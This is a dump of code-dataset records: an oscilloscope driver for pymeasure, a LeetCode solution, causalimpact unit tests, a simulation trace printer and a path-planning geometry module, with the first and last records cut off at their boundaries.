elif céd == 50:\r\n céd = 20\r\n elif céd == 20:\r\n céd = 10\r\n elif céd == 10:\r\n céd = 5\r\n elif céd == 5:\r\n céd = 1\r\n totcéd = 0\r\n if total == 0:\r\n break\r\nprint('=' * 30)\r\nprint('\\033[34mValor sacado!\\033[m')","repo_name":"GuiPolezi/Cursoemvideo-Python","sub_path":"Exercícios/ex071.py","file_name":"ex071.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"20524072809","text":"import logging\nimport re\n\nfrom pymeasure.instruments import Instrument\nfrom pymeasure.instruments.teledyne.teledyne_oscilloscope import TeledyneOscilloscope,\\\n TeledyneOscilloscopeChannel, sanitize_source\nfrom pymeasure.instruments.validators import strict_discrete_set, strict_range\n\nlog = logging.getLogger(__name__)\nlog.addHandler(logging.NullHandler())\n\n\ndef _math_define_validator(value, values):\n \"\"\"\n Validate the input of the math_define property\n :param value: input parameters as a 3-element tuple\n :param values: allowed space for each parameter\n \"\"\"\n if not isinstance(value, tuple):\n raise ValueError('Input value {} of trigger_select should be a tuple'.format(value))\n if len(value) != 3:\n raise ValueError('Number of parameters {} different from 3'.format(len(value)))\n output = (sanitize_source(value[0]), value[1], sanitize_source(value[2]))\n for i in range(3):\n strict_discrete_set(output[i], values=values[i])\n return output\n\n\ndef _measure_delay_validator(value, values):\n \"\"\"\n Validate the input of the measure_delay property\n :param value: input parameters as a 3-element tuple\n :param values: allowed space for each parameter\n \"\"\"\n if not isinstance(value, tuple):\n raise ValueError('Input value {} of trigger_select should be a tuple'.format(value))\n if len(value) != 3:\n raise ValueError('Number of parameters {} different from 3'.format(len(value)))\n output = (value[0], sanitize_source(value[1]), sanitize_source(value[2]))\n if output[1][0] > output[2][0]:\n raise ValueError(f'First channel number {output[1]} must be <= than second one {output[2]}')\n for i in range(3):\n strict_discrete_set(output[i], values=values[i])\n return output\n\n\nclass LeCroyT3DSO1204Channel(TeledyneOscilloscopeChannel):\n \"\"\"Implementation of a LeCroy T3DSO1204 Oscilloscope channel.\n\n Implementation modeled on Channel object of Keysight DSOX1102G instrument.\n \"\"\"\n\n TRIGGER_SLOPES = {\"negative\": \"NEG\", \"positive\": \"POS\", \"window\": \"WINDOW\"}\n\n # Change listed values for existing commands:\n trigger_slope_values = TRIGGER_SLOPES\n\n bwlimit = Instrument.control(\n \"BWL?\", \"BWL %s\",\n \"\"\"Control the 20 MHz internal low-pass filter (strict bool).\n\n This oscilloscope only has one frequency available for this filter.\n \"\"\",\n validator=strict_discrete_set,\n values=TeledyneOscilloscopeChannel._BOOLS,\n map_values=True\n )\n\n invert = Instrument.control(\n \"INVS?\", \"INVS %s\",\n \"\"\"Control the inversion of the input signal (strict bool).\"\"\",\n validator=strict_discrete_set,\n values=TeledyneOscilloscopeChannel._BOOLS,\n map_values=True\n )\n\n skew_factor = Instrument.control(\n \"SKEW?\", \"SKEW %.2ES\",\n \"\"\"Control the channel-to-channel skew factor for the specified channel.\n Each analog channel can be adjusted + or -100 ns for a total of 200 ns difference\n between channels. You can use the oscilloscope's skew control to remove cable-delay\n errors between channels.\n \"\"\",\n validator=strict_range,\n values=[-1e-7, 1e-7],\n preprocess_reply=lambda v: v.rstrip('S')\n )\n\n trigger_level2 = Instrument.control(\n \"TRLV2?\", \"TRLV2 %.2EV\",\n \"\"\"Control the lower trigger level voltage for the specified source (float).\n Higher and lower trigger levels are used with runt/slope triggers.\n When setting the trigger level it must be divided by the probe attenuation. This is\n not documented in the datasheet and it is probably a bug of the scope firmware.\n An out-of-range value will be adjusted to the closest legal value.\n \"\"\"\n )\n\n unit = Instrument.control(\n \"UNIT?\", \"UNIT %s\",\n \"\"\"Control the unit of the specified trace. Measurement results, channel sensitivity, and\n trigger level will reflect the measurement units you select. (\"A\" for Amperes, \"V\" for\n Volts).\n \"\"\",\n validator=strict_discrete_set,\n values=[\"A\", \"V\"]\n )\n\n\nclass LeCroyT3DSO1204(TeledyneOscilloscope):\n \"\"\"Represents the LeCroy T3DSO1204 Oscilloscope interface for interacting with the instrument.\n\n Refer to the LeCroy T3DSO1204 Oscilloscope Programmer's Guide for further details about\n using the lower-level methods to interact directly with the scope.\n\n This implementation is based on the shared base class :class:`TeledyneOscilloscope`.\n\n Attributes:\n\n WRITE_INTERVAL_S: minimum time between two commands. If a command is received less than\n WRITE_INTERVAL_S after the previous one, the code blocks until at least WRITE_INTERVAL_S\n seconds have passed.\n Because the oscilloscope takes a non-negligible time to perform some operations, it might\n be needed for the user to tweak the sleep time between commands.\n The WRITE_INTERVAL_S is set to 10ms as default however its optimal value heavily depends\n on the actual commands and on the connection type, so it is impossible to give a unique\n value to fit all cases. An interval between 10ms and 500ms second proved to be good,\n depending on the commands and connection latency.\n\n .. code-block:: python\n\n scope = LeCroyT3DSO1204(resource)\n scope.autoscale()\n ch1_data_array, ch1_preamble = scope.download_waveform(source=\"C1\", points=2000)\n # ...\n scope.shutdown()\n \"\"\"\n\n _BOOLS = {True: \"ON\", False: \"OFF\"}\n\n WRITE_INTERVAL_S = 0.02 # seconds\n\n ch_1 = Instrument.ChannelCreator(LeCroyT3DSO1204Channel, 1)\n\n ch_2 = Instrument.ChannelCreator(LeCroyT3DSO1204Channel, 2)\n\n ch_3 = Instrument.ChannelCreator(LeCroyT3DSO1204Channel, 3)\n\n ch_4 = Instrument.ChannelCreator(LeCroyT3DSO1204Channel, 4)\n\n def __init__(self, adapter, name=\"LeCroy T3DSO1204 Oscilloscope\", **kwargs):\n super().__init__(adapter, name, **kwargs)\n\n ##################\n # Timebase Setup #\n ##################\n\n timebase_hor_magnify = Instrument.control(\n \"HMAG?\", \"HMAG %.2ES\",\n \"\"\"Control the zoomed (delayed) window horizontal scale (seconds/div).\n\n The main sweep scale determines the range for this command.\n \"\"\",\n validator=strict_range,\n values=[1e-9, 20e-3]\n )\n\n timebase_hor_position = Instrument.control(\n \"HPOS?\", \"HPOS %.2ES\",\n \"\"\"Control the horizontal position in the zoomed (delayed) view of the main sweep.\n\n The main sweep range and the main sweep horizontal position determine\n the range for this command. The value for this command must keep the zoomed view window\n within the main sweep range.\n \"\"\",\n )\n\n @property\n def timebase(self):\n \"\"\"Get timebase setup as a dict containing the following keys:\n\n - \"timebase_scale\": horizontal scale in seconds/div (float)\n - \"timebase_offset\": interval in seconds between the trigger and the reference\n position (float)\n - \"timebase_hor_magnify\": horizontal scale in the zoomed window in seconds/div (float)\n - \"timebase_hor_position\": horizontal position in the zoomed window in seconds\n (float)\n\n \"\"\"\n tb_setup = {\n \"timebase_scale\": self.timebase_scale,\n \"timebase_offset\": self.timebase_offset,\n \"timebase_hor_magnify\": self.timebase_hor_magnify,\n \"timebase_hor_position\": self.timebase_hor_position\n }\n return tb_setup\n\n def timebase_setup(self, scale=None, offset=None, hor_magnify=None, hor_position=None):\n \"\"\"Set up timebase. Unspecified parameters are not modified. Modifying a single parameter\n might impact other parameters. Refer to oscilloscope documentation and make multiple\n consecutive calls to timebase_setup if needed.\n\n :param scale: interval in seconds between the trigger event and the reference position.\n :param offset: horizontal scale per division in seconds/div.\n :param hor_magnify: horizontal scale in the zoomed window in seconds/div.\n :param hor_position: horizontal position in the zoomed window in seconds.\"\"\"\n\n if scale is not None:\n self.timebase_scale = scale\n if offset is not None:\n self.timebase_offset = offset\n if hor_magnify is not None:\n self.timebase_hor_magnify = hor_magnify\n if hor_position is not None:\n self.timebase_hor_position = hor_position\n\n ###############\n # Acquisition #\n ###############\n\n acquisition_type = Instrument.control(\n \"ACQW?\", \"ACQW %s\",\n \"\"\"Control the type of data acquisition.\n\n Can be 'normal', 'peak', 'average', 'highres'.\n \"\"\",\n validator=strict_discrete_set,\n values={\"normal\": \"SAMPLING\", \"peak\": \"PEAK_DETECT\", \"average\": \"AVERAGE\",\n \"highres\": \"HIGH_RES\"},\n map_values=True,\n get_process=lambda v: [v[0].lower(), int(v[1])] if len(v) == 2 and v[0] == \"AVERAGE\" else v\n )\n\n acquisition_average = Instrument.control(\n \"AVGA?\", \"AVGA %d\",\n \"\"\"Control the averaging times of average acquisition.\"\"\",\n validator=strict_discrete_set,\n values=[4, 16, 32, 64, 128, 256, 512, 1024]\n )\n\n acquisition_status = Instrument.measurement(\n \"SAST?\", \"\"\"Get the acquisition status of the scope.\"\"\",\n values={\"stopped\": \"Stop\", \"triggered\": \"Trig'd\", \"ready\": \"Ready\", \"auto\": \"Auto\",\n \"armed\": \"Arm\"},\n map_values=True\n )\n\n acquisition_sampling_rate = Instrument.measurement(\n \"SARA?\", \"\"\"Get the sample rate of the scope.\"\"\"\n )\n\n def acquisition_sample_size(self, source):\n \"\"\"Get acquisition sample size for a certain channel. Used mainly for waveform acquisition.\n If the source is MATH, the SANU? MATH query does not seem to work, so I return the memory\n size instead.\n\n :param source: channel number of channel name.\n :return: acquisition sample size of that channel.\n \"\"\"\n if isinstance(source, str):\n source = sanitize_source(source)\n if source in [1, \"C1\"]:\n return self.acquisition_sample_size_c1\n elif source in [2, \"C2\"]:\n return self.acquisition_sample_size_c2\n elif source in [3, \"C3\"]:\n return self.acquisition_sample_size_c3\n elif source in [4, \"C4\"]:\n return self.acquisition_sample_size_c4\n elif source == \"MATH\":\n math_define = self.math_define[1]\n match = re.match(r\"'(\\w+)[+\\-/*](\\w+)'\", math_define)\n return min(self.acquisition_sample_size(match.group(1)),\n self.acquisition_sample_size(match.group(2)))\n else:\n raise ValueError(\"Invalid source: must be 1, 2, 3, 4 or C1, C2, C3, C4, MATH.\")\n\n acquisition_sample_size_c1 = Instrument.measurement(\n \"SANU? C1\", \"\"\"Get the number of data points that the hardware\n will acquire from the input signal of channel 1.\n Note.\n Channel 2 and channel 1 share the same ADC, so the sample is the same too.\n \"\"\"\n )\n\n acquisition_sample_size_c2 = Instrument.measurement(\n \"SANU? C1\", \"\"\"Get the number of data points that the hardware\n will acquire from the input signal of channel 2.\n Note.\n Channel 2 and channel 1 share the same ADC, so the sample is the same too.\n \"\"\"\n )\n\n acquisition_sample_size_c3 = Instrument.measurement(\n \"SANU? C3\", \"\"\"Get the number of data points that the hardware\n will acquire from the input signal of channel 3.\n Note.\n Channel 3 and channel 4 share the same ADC, so the sample is the same too.\n \"\"\"\n )\n\n acquisition_sample_size_c4 = Instrument.measurement(\n \"SANU? C3\", \"\"\"Get the number of data points that the hardware\n will acquire from the input signal of channel 4.\n Note.\n Channel 3 and channel 4 share the same ADC, so the sample is the same too.\n \"\"\"\n )\n\n ##################\n # Waveform #\n ##################\n\n memory_size = Instrument.control(\n \"MSIZ?\", \"MSIZ %s\",\n \"\"\"Control the maximum depth of memory.\n\n :={7K,70K,700K,7M} for non-interleaved mode. Non-interleaved means a single channel is\n active per A/D converter. Most oscilloscopes feature two channels per A/D converter.\n\n :={14K,140K,1.4M,14M} for interleave mode. Interleave mode means multiple active\n channels per A/D converter.\n \"\"\",\n validator=strict_discrete_set,\n values={7e3: \"7K\", 7e4: \"70K\", 7e5: \"700K\", 7e6: \"7M\",\n 14e3: \"14K\", 14e4: \"140K\", 14e5: \"1.4M\", 14e6: \"14M\"},\n map_values=True\n )\n\n @property\n def waveform_preamble(self):\n \"\"\"Get preamble information for the selected waveform source as a dict with the\n following keys:\n\n - \"type\": normal, peak detect, average, high resolution (str)\n - \"requested_points\": number of data points requested by the user (int)\n - \"sampled_points\": number of data points sampled by the oscilloscope (int)\n - \"transmitted_points\": number of data points actually transmitted (optional) (int)\n - \"memory_size\": size of the oscilloscope internal memory in bytes (int)\n - \"sparsing\": sparse point. It defines the interval between data points. (int)\n - \"first_point\": address of the first data point to be sent (int)\n - \"source\": source of the data : \"C1\", \"C2\", \"C3\", \"C4\", \"MATH\".\n - \"unit\": Physical units of the Y-axis\n - \"type\": type of data acquisition. Can be \"normal\", \"peak\", \"average\", \"highres\"\n - \"average\": average times of average acquisition\n - \"sampling_rate\": sampling rate (it is a read-only property)\n - \"grid_number\": number of horizontal grids (it is a read-only property)\n - \"status\": acquisition status of the scope. Can be \"stopped\", \"triggered\", \"ready\",\n \"auto\", \"armed\"\n - \"xdiv\": horizontal scale (units per division) in seconds\n - \"xoffset\": time interval in seconds between the trigger event and the reference position\n - \"ydiv\": vertical scale (units per division) in Volts\n - \"yoffset\": value that is represented at center of screen in Volts\n \"\"\"\n vals = self.values(\"WFSU?\")\n preamble = {\n \"sparsing\": vals[vals.index(\"SP\") + 1],\n \"requested_points\": vals[vals.index(\"NP\") + 1],\n \"first_point\": vals[vals.index(\"FP\") + 1],\n \"transmitted_points\": None,\n \"source\": self.waveform_source,\n \"type\": self.acquisition_type,\n \"sampling_rate\": self.acquisition_sampling_rate,\n \"grid_number\": self._grid_number,\n \"status\": self.acquisition_status,\n \"memory_size\": self.memory_size,\n \"xdiv\": self.timebase_scale,\n \"xoffset\": self.timebase_offset\n }\n preamble[\"average\"] = self.acquisition_average if preamble[\"type\"][0] == \"average\" else None\n strict_discrete_set(self.waveform_source, [\"C1\", \"C2\", \"C3\", \"C4\", \"MATH\"])\n preamble[\"sampled_points\"] = self.acquisition_sample_size(self.waveform_source)\n return self._fill_yaxis_preamble(preamble)\n\n def _fill_yaxis_preamble(self, preamble=None):\n \"\"\"Fill waveform preamble section concerning the Y-axis.\n :param preamble: waveform preamble to be filled\n :return: filled preamble\n \"\"\"\n if preamble is None:\n preamble = {}\n if self.waveform_source == \"MATH\":\n preamble[\"ydiv\"] = self.math_vdiv\n preamble[\"yoffset\"] = self.math_vpos\n preamble[\"unit\"] = None\n else:\n preamble[\"ydiv\"] = self.ch(self.waveform_source).scale\n preamble[\"yoffset\"] = self.ch(self.waveform_source).offset\n preamble[\"unit\"] = self.ch(self.waveform_source).unit\n return preamble\n\n ###############\n # Math #\n ###############\n\n math_define = Instrument.control(\n \"DEF?\", \"DEF EQN,'%s%s%s'\",\n \"\"\"Control the desired waveform math operation between two channels.\n\n Three parameters must be passed as a tuple:\n\n #. source1 : source channel on the left\n #. operation : operator must be \"*\", \"/\", \"+\", \"-\"\n #. source2 : source channel on the right\n\n \"\"\",\n validator=_math_define_validator,\n values=[[\"C1\", \"C2\", \"C3\", \"C4\"], [\"*\", \"/\", \"+\", \"-\"], [\"C1\", \"C2\", \"C3\", \"C4\"]]\n )\n\n math_vdiv = Instrument.control(\n \"MTVD?\", \"MTVD %.2EV\",\n \"\"\"Control the vertical scale of the selected math operation.\n\n This command is only valid in add, subtract, multiply and divide operation.\n Note: legal values for the scale depend on the selected operation.\n \"\"\",\n validator=strict_discrete_set,\n values=[5e-4, 1e-3, 2e-3, 5e-3, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1, 2, 5, 10, 20, 50, 100]\n )\n\n math_vpos = Instrument.control(\n \"MTVP?\", \"MTVP %d\",\n \"\"\"Control the vertical position of the math waveform with specified source.\n\n Note: the point represents the screen pixels and is related to the screen center. For\n example, if the point is 50. The math waveform will be displayed 1 grid above the vertical\n center of the screen. Namely one grid is 50.\n \"\"\",\n validator=strict_range,\n values=[-255, 255]\n )\n\n ###############\n # Measure #\n ###############\n\n measure_delay = Instrument.control(\n \"MEAD?\", \"MEAD %s,%s-%s\",\n \"\"\"Control measurement delay.\n\n The MEASURE_DELY command places the instrument in the continuous measurement mode and\n starts a type of delay measurement.\n The MEASURE_DELY? query returns the measured value of delay type.\n The command accepts three arguments with the following syntax:\n\n measure_delay = (,,)\n\n := {PHA,FRR,FRF,FFR,FFF,LRR,LRF,LFR,LFF,SKEW}\n\n , := {C1,C2,C3,C4} where if sourceA=CX and sourceB=CY, then X < Y\n\n ========= ======================================================================\n Type Description\n ========= ======================================================================\n PHA The phase difference between two channels. (rising edge - rising edge)\n FRR Delay between two channels. (first rising edge - first rising edge)\n FRF Delay between two channels. (first rising edge - first falling edge)\n FFR Delay between two channels. (first falling edge - first rising edge)\n FFF Delay between two channels. (first falling edge - first falling edge)\n LRR Delay between two channels. (first rising edge - last rising edge)\n LRF Delay between two channels. (first rising edge - last falling edge)\n LFR Delay between two channels. (first falling edge - last rising edge)\n LFF Delay between two channels. (first falling edge - last falling edge)\n Skew Delay between two channels. (edge – edge of the same type)\n ========= ======================================================================\n \"\"\",\n validator=_measure_delay_validator,\n values=[[\"PHA\", \"FRR\", \"FRF\", \"FFR\", \"FFF\", \"LRR\", \"LRF\", \"LFR\", \"LFF\", \"Skey\"],\n [\"C1\", \"C2\", \"C3\", \"C4\"], [\"C1\", \"C2\", \"C3\", \"C4\"]]\n )\n\n ###############\n # Display #\n ###############\n\n menu = Instrument.control(\n \"MENU?\", \"MENU %s\",\n \"\"\"Control the bottom menu enabled state (strict bool).\"\"\",\n validator=strict_discrete_set,\n values=TeledyneOscilloscope._BOOLS,\n map_values=True\n )\n\n grid_display = Instrument.control(\n \"GRDS?\", \"GRDS %s\",\n \"\"\"Control the type of the grid which is used to display (FULL, HALF, OFF).\"\"\",\n validator=strict_discrete_set,\n values={\"full\": \"FULL\", \"half\": \"HALF\", \"off\": \"OFF\"},\n map_values=True\n )\n","repo_name":"pymeasure/pymeasure","sub_path":"pymeasure/instruments/lecroy/lecroyT3DSO1204.py","file_name":"lecroyT3DSO1204.py","file_ext":"py","file_size_in_byte":20269,"program_lang":"python","lang":"en","doc_type":"code","stars":514,"dataset":"github-code","pt":"81"} +{"seq_id":"41262401677","text":"# -*- coding: utf-8 -*-\n# @Author: WuLC\n# @Date: 2016-11-25 09:42:17\n# @Last modified by: WuLC\n# @Last Modified time: 2016-11-25 09:42:35\n# @Email: liangchaowu5@gmail.com\n\nclass Solution(object):\n def minMoves2(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.sort()\n n = len(nums)\n target = (nums[n/2]+nums[n/2-1])/2 if n % 2 == 0 else nums[n/2]\n return sum([abs(num - target) for num in nums])","repo_name":"WuLC/LeetCode","sub_path":"Algorithm/Python/462. Minimum Moves to Equal Array Elements II.py","file_name":"462. Minimum Moves to Equal Array Elements II.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"81"} +{"seq_id":"38544401465","text":"import os\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\n\nimport causalimpact.data as cid\n\nimport numpy as np\nimport pandas as pd\n\n\nCURR_PATH = os.path.dirname(__file__)\nTEST_DATA = os.path.join(CURR_PATH, \"testdata\", \"data.csv\")\n\n\nclass DataCreationTest(parameterized.TestCase):\n\n @classmethod\n def setUpClass(cls):\n super(DataCreationTest, cls).setUpClass()\n\n # Read in sample data and set column \"t\" as the index\n with open(TEST_DATA, \"r\") as fl:\n df = pd.read_csv(fl)\n df = df.set_index(pd.to_datetime(df[\"t\"]))\n df.drop(columns=[\"t\"], inplace=True)\n\n cls._data = df\n treatment_start_index = 60\n cls._pre_period = (df.index[0], df.index[treatment_start_index - 1])\n cls._post_period = (df.index[treatment_start_index], df.index[-1])\n cls._treatment_start = cls._post_period[0]\n\n def testCorrectDataWithOnlyOutcome(self):\n df = self._data[[\"y\"]]\n ci_data = cid.CausalImpactData(\n df, pre_period=self._pre_period, post_period=self._post_period)\n self.assertEqual(ci_data.outcome_column, \"y\")\n self.assertIsNone(ci_data.feature_columns)\n pre_index = self._data.index[self._data.index < self._treatment_start]\n post_index = self._data.index[self._data.index >= self._treatment_start]\n self.assertTrue(ci_data.model_pre_data.index.equals(pre_index))\n self.assertTrue(ci_data.model_after_pre_data.index.equals(post_index))\n\n @parameterized.named_parameters([\n {\n \"testcase_name\": \"only_outcome_given\",\n \"outcome_column\": \"y\",\n \"expected_feature_columns\": [\"x1\", \"x2\"]\n },\n {\n \"testcase_name\": \"no_columns_given\",\n \"outcome_column\": None,\n \"expected_feature_columns\": [\"x1\", \"x2\"]\n },\n ])\n def testCorrectDataWithColumnInput(self, outcome_column,\n expected_feature_columns):\n ci_data = cid.CausalImpactData(\n self._data,\n pre_period=self._pre_period,\n post_period=self._post_period,\n outcome_column=outcome_column)\n self.assertEqual(ci_data.outcome_column, \"y\")\n self.assertSetEqual(\n set(ci_data.feature_columns), set(expected_feature_columns))\n self.assertSetEqual(\n set(ci_data.pre_data.columns), set([\"y\"] + expected_feature_columns))\n self.assertSetEqual(\n set(ci_data.after_pre_data.columns),\n set([\"y\"] + expected_feature_columns))\n pre_index = self._data.index[self._data.index < self._treatment_start]\n post_index = self._data.index[self._data.index >= self._treatment_start]\n self.assertTrue(ci_data.pre_data.index.equals(pre_index))\n self.assertTrue(ci_data.after_pre_data.index.equals(post_index))\n\n def testFailsWhenOutcomeDoesntExist(self):\n with self.assertRaises(KeyError):\n cid.CausalImpactData(\n self._data,\n pre_period=self._pre_period,\n post_period=self._post_period,\n outcome_column=\"z\")\n\n @parameterized.named_parameters([{\n \"testcase_name\": \"NoStandardize\",\n \"standardize_data\": False\n }, {\n \"testcase_name\": \"Standardize\",\n \"standardize_data\": True\n }])\n def testStandardize(self, standardize_data):\n ci_data = cid.CausalImpactData(\n self._data,\n pre_period=self._pre_period,\n post_period=self._post_period,\n standardize_data=standardize_data)\n pre_time = pd.to_datetime(\"2016-02-20 22:41:20\")\n post_time = pd.to_datetime(\"2016-02-20 22:51:20\")\n index = [\"y\", \"x1\", \"x2\"]\n\n # These are just hard-coded values, to ensure there is some kind of\n # a difference that seems reasonable (e.g. could be standardized based\n # on looking at the numbers).\n if standardize_data:\n pd.testing.assert_series_equal(\n ci_data.model_pre_data.iloc[0],\n pd.Series([-0.718908, 1.684957, 0.705064], index=index,\n name=pre_time),\n # Allow minor differences due to encoding.\n rtol=0.01)\n pd.testing.assert_series_equal(\n ci_data.model_after_pre_data.iloc[0],\n pd.Series([0.355322, -1.456488, -2.652383],\n index=index,\n name=post_time),\n # Allow minor differences due to encoding.\n rtol=0.01)\n else:\n pd.testing.assert_series_equal(\n ci_data.pre_data.iloc[0],\n pd.Series([110.0, 134., 128], index=index, name=pre_time))\n pd.testing.assert_series_equal(\n ci_data.after_pre_data.iloc[0],\n pd.Series([123., 123., 123.], index=index, name=post_time),\n )\n\n def testMissingValues(self):\n na_data = self._data.copy()\n na_data.loc[self._treatment_start, \"x1\"] = np.nan\n with self.assertRaises(ValueError):\n cid.CausalImpactData(\n na_data, pre_period=self._pre_period, post_period=self._post_period)\n\n\nif __name__ == \"__main__\":\n absltest.main()\n","repo_name":"google/tfp-causalimpact","sub_path":"causalimpact/data_test.py","file_name":"data_test.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"81"} +{"seq_id":"37747795624","text":"import pickle\n\n\ndef print_map(map, locs):\n print('map:')\n d = [[0 for _ in range(0,len(map))] for _ in range(0, len(map[0]))]\n for x in range(0, len(map)):\n for y in range(0, len(map[x])):\n d[y][x] = ' ' + str(map[x][y])\n for a in locs:\n l = locs[a]\n if l[0] == x and l[1] == y:\n d[y][x] = a[0]\n for y in d:\n print(''.join(y))\n\n\ndef print_plan(plan):\n print('plan:')\n for p in plan:\n print(p[0])\n\ndef print_trace(states, plans):\n print('Trace of states and actions:')\n for i,s in enumerate(states):\n print('state', i)\n print_map(s.map, s.loc)\n # print('loc:')\n for agent in s.agents:\n if agent in s.loc:\n print(' ', agent[0], s.loc[agent])\n # print('targeting:')\n for t in s.target:\n print(f' (targeted {t[0]} {s.target[t][0]})')\n for a in s.score:\n print(f' (score {a[0]} {s.score[a]})')\n # print('goal:')\n # print(s.goal)\n for g in s.goal:\n print(f' (goal {g[0]} {s.goal[g]})')\n for a in s.assumes:\n print(f' (assumes {a[0]} {s.assumes[a]})')\n \n if i < len(plans)-1:\n print_plan(plans[i])\n\n\n# def print_truth(states):\n# print('Truth data:')\n# for i,s in enumerate(states):\n# if i > 0:\n# print('state', i)\n# for t in s.target:\n# print(f'(targeting {t[0]} {s.target[t][0]})')\n# for g in s.goal:\n# print(f'(goal {g[0]} {s.goal[g]})')\n\n\ndef print_sexpr(states):\n # agents\n for agent in states[0].agents:\n print(f'(isa {agent[0]} {agent[1]})')\n\n # goals\n # for agent in states[0].goal:\n # for goal in states[0].goal[agent]:\n # args = \"\".join(f' {a[0]}' for a in states[0].goal[agent][goal])\n # print(f'(goal {agent[0]} ({goal}{args}))')\n\n # maps\n for x in range(0, len(states[0].map)):\n for y in range(0, len(states[0].map[x])):\n if states[0].map[x][y] == 0:\n print(f'(blocked {x} {y})')\n else:\n print(f'(open {x} {y})')\n\n for i, s in enumerate(states):\n # locations\n for agent in s.agents:\n if agent in s.loc:\n x,y = s.loc[agent]\n print(f'(observesAt x (loc-at {agent[0]} {x} {y}) {i})')\n # goals\n for agent in s.goal:\n for goal in s.goal[agent]:\n args = \"\".join(f' {a[0]}' for a in s.goal[agent][goal])\n print(f'(goal {agent[0]} ({goal} {args}) {i})')\n\n\ndef calc_stats(base, states):\n prev = None\n for state in states[:-1]:\n numGoals = len(state.goal)\n if numGoals in base['goals']:\n base['goals'][numGoals] += 1\n else:\n base['goals'][numGoals] = 1\n if prev:\n if prev.goal == state.goal:\n base['goalsChanged'][False] += 1\n else:\n base['goalsChanged'][True] += 1\n prev = state\n return base\n\ndef print_stats(stats):\n print(\"stats:\")\n print(stats)\n total = 0\n for g in stats['goals']:\n total += stats['goals'][g]\n for g in stats['goals']:\n print(g, float(stats['goals'][g])/total)\n\n\nif __name__ == '__main__':\n print_visuals = True\n stats = { 'goals':{}, 'goalsChanged':{True:0, False:0}}\n all = pickle.load(open('all.pickle', 'rb'))\n for i, cond1 in enumerate(all):\n for j, cond2 in enumerate(cond1):\n for k, cond3 in enumerate(cond2):\n print('')\n print('* Simulations for conditions', i, j, k, '*')\n for c, (states, plans) in enumerate(cond3):\n stats = calc_stats(stats, states)\n if print_visuals:\n print('- Sim run', i, j, k, c, '-')\n print_trace(states, plans)\n else:\n print(f'(in-simulation {i} {j} {k} {c})')\n print_sexpr(states)\n \n print_stats(stats)\n","repo_name":"FandM-CARES/socialSim","sub_path":"print_trace.py","file_name":"print_trace.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"7292417417","text":"from math import sqrt, cos, sin, tan, atan, pi\n\n\ndef pi_2_pi(angle):\n \"\"\"将角度转为-pi到pi之间\"\"\"\n return (angle + pi) % (2 * pi) - pi\n\n\ndef calc_index(node, c):\n \"\"\"计算节点的哈希值\"\"\"\n ind = (node.gradient_z_ind - c.min_gradient_z) * c.theta_xyw * c.zw * c.yw * c.xw + \\\n (node.theta_xy_ind - c.min_theta_xy) * c.zw * c.yw * c.xw + \\\n (node.zind - c.minz) * c.xw * c.yw + \\\n (node.yind - c.miny) * c.xw + \\\n (node.xind - c.minx)\n\n if ind <= 0:\n print(\"Error(calc_index):\", ind)\n\n return ind\n\n\ndef calc_cost(current, ngoal):\n nx, ny, nz = ngoal.xlist[-1], ngoal.ylist[-1], ngoal.zlist[-1]\n cx, cy, cz = current.xlist[-1], current.ylist[-1], current.zlist[-1]\n return current.cost + abs(nx-cx) + abs(ny-cy) + abs(nz-cz)\n\n\ndef calc_cost_new(current, heuristic):\n cx, cy, cz = current.xlist[-1], current.ylist[-1], current.zlist[-1]\n return current.cost + 0.95*heuristic[round(cx), round(cy)]\n\n\ndef z_y_move(x, y, z, theta_xy, gradient_z, distance, radi): # 直线或者圆探索\n if radi is not None:\n r = radi\n theta = pi_2_pi(distance / r)\n tmp_x = r * sin(theta)\n tmp_y = r - r*cos(theta)\n new_r = sqrt(tmp_x**2 + tmp_y**2)\n theta0 = theta_xy + atan(tmp_y/tmp_x)\n x += new_r * cos(theta0)\n y += new_r * sin(theta0)\n z += distance*gradient_z\n theta_xy += theta\n else:\n x += distance*cos(theta_xy)\n y += distance*sin(theta_xy)\n z += distance*gradient_z\n\n return x, y, z, theta_xy, gradient_z\n\n\ndef spr_move1(x, y, z, theta_xy, gradient_z, distance, len_s, radi): # 直圆缓和曲线\n ls, l = len_s, distance\n r = radi\n # -(79*l**12)/(2043241200*r**6*ls**6)) # 弦长\n c = l*(1-(l**4)/(90*r**2*ls**2)+(l**8)/(22680*r**4*ls**4))\n # -(23*l**12)/(1915538625*r**6*ls**6)) # 弦切角\n theta = (l**2)/(r*ls)*(1/6-(l**4) /\n (2835*r**2*ls**2)-(l**8)/(467775*r**4*ls**4))\n beta = (l**2)/(2*r*ls) # 切线角\n theta0 = theta_xy + theta\n x += c * cos(theta0)\n y += c * sin(theta0)\n z += distance*gradient_z\n theta_xy += beta\n return x, y, z, theta_xy, gradient_z\n\n\ndef spr_move2(x, y, z, theta_xy, gradient_z, distance, len_s, radi=None):\n ls, l = len_s, len_s\n r = radi\n # -(79*l**6)/(2043241200*r**6)) # 弦长\n c = l*(1-(l**2)/(90*r**2)+(l**4)/(22680*r**4))\n # -(23*l**6)/(1915538625*r**6)) # 弦切角\n theta = (l)/(r)*(1/6-(l**2)/(2835*r**2)-(l**4)/(467775*r**4))\n beta = (l)/(2*r) # 切线角\n theta0 = theta_xy + (beta-theta)\n x_final = x + c * cos(theta0)\n y_final = y + c * sin(theta0)\n theta_xy_final = pi_2_pi(theta_xy + beta)\n\n ls, l = len_s, len_s - distance\n # -(79*l**12)/(2043241200*r**6*ls**6)) # 弦长\n c = l*(1-(l**4)/(90*r**2*ls**2)+(l**8)/(22680*r**4*ls**4))\n # -(23*l**12)/(1915538625*r**6*ls**6)) # 弦切角\n theta = (l**2)/(r*ls)*(1/6-(l**4) /\n (2835*r**2*ls**2)-(l**8)/(467775*r**4*ls**4))\n beta = (l**2)/(2*r*ls) # 切线角\n theta0 = theta_xy_final + pi - theta\n x = x_final + c * cos(theta0)\n y = y_final + c * sin(theta0)\n z = z + distance * gradient_z\n theta_xy = 